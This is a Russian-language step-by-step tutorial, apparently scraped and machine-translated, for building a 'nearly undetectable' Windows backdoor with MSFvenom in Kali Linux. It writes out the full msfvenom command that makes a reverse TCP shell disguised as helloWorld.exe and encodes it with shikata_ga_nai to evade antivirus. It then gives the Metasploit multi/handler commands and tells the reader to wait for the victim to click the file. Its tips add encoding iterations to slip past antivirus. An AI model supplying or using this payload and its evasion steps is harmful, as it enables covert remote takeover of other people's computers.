Как создать почти не обнаруживаемый бэкдор с помощью MSFvenom в Kali Linux

Оглавление:

Как создать почти не обнаруживаемый бэкдор с помощью MSFvenom в Kali Linux
Как создать почти не обнаруживаемый бэкдор с помощью MSFvenom в Kali Linux

Видео: Как создать почти не обнаруживаемый бэкдор с помощью MSFvenom в Kali Linux

Видео: Как создать почти не обнаруживаемый бэкдор с помощью MSFvenom в Kali Linux
Видео: GOWIPE Attack Strategy updated-2017 | Easily get 3 stars on TH8 /TH9 |Clash of clans 2024, Май
Anonim

Бэкдор используется для обхода механизмов безопасности, часто тайно и в большинстве случаев незаметно. Используя MSFvenom, комбинацию msfpayload и msfencode, можно создать бэкдор, который соединяется с злоумышленником с помощью TCP обратной оболочки. Чтобы разработать бэкдор, вам необходимо изменить сигнатуру вашего вредоносного ПО, чтобы избежать любого антивирусного программного обеспечения. Завершите этот проект на паре компьютеров, к которым у вас есть разрешение на доступ, и в процессе вы узнаете больше о компьютерной безопасности и о том, как работает этот вид бэкдора.

Шаги

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 1
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 1

Шаг 1. Запустите Kali и запустите терминальную консоль

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux, шаг 2
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux, шаг 2

Шаг 2. Введите ifconfig, чтобы отобразить интерфейс и проверить свой IP-адрес

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 3
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 3

Шаг 3. Введите msfvenom -l encoders, чтобы отобразить список кодировщиков

Вы будете использовать x86 / shikata_ga_nai в качестве кодировщика

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 4
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 4

Шаг 4. Введите "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 --platform windows обозначает архитектуру для использования.
  • -p windows / shell / reverse_tcp обозначает полезные данные для встраивания.
  • LHOST обозначает IP-адрес слушателя.
  • LPORT обозначает порт слушателя.
  • -b «\ x00» означает, что нужно избегать неправильного символа (нулевые байты).
  • -e x86 / shikata_ga_nai обозначает имя кодировщика.
  • -f exe> helloWorld.exe обозначает вывод в формате.
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 5
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 5

Шаг 5. Введите msfconsole, чтобы активировать Metasploit

Теперь вы создали свой бэкдор. Когда жертва нажимает на helloWorld.exe, встроенная полезная нагрузка оболочки активируется и устанавливает соединение с вашей системой. Чтобы получить соединение, вам нужно открыть мульти-обработчик в Metasploit и установить полезные нагрузки

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 6
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 6

Шаг 6. Введите use exploit / multi / handler

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 7
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 7

Шаг 7. Введите set payload windows / shell / reverse_tcp

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 8
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 8

Шаг 8. Введите show options, чтобы проверить модуль

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 9
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 9

Шаг 9. Введите set LHOST 192.168.48.129

«LHOST» обозначает IP-адрес слушателя

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 10
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 10

Шаг 10. Введите set LPORT 4444

«LPORT» обозначает порт слушателя

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 11
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 11

Шаг 11. Наберите run и дождитесь соединения с машины жертвы

Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 12
Создайте почти необнаруживаемый бэкдор с помощью MSFvenom в Kali Linux Шаг 12

Шаг 12. Дождитесь, пока жертва нажмет на helloWorld.exe

После этого вы успешно подключитесь к машине жертвы.

подсказки

  • Использование -i в MSFvenom будет представлять итерации кодирования. Иногда больше итераций могут помочь обойти антивирус.
  • Вы узнали, как сгенерировать бэкдор и закодировать с помощью MSFvenom, но в настоящее время этот метод не будет работать идеально против некоторых антивирусных программ. Причина этого в шаблонах выполнения в MSFvenom. Поставщики антивирусных программ добавили статические сигнатуры этих шаблонов и просто ищут их. Решение этой проблемы - использовать другой шаблон выполнения или другие инструменты.

Рекомендуемые: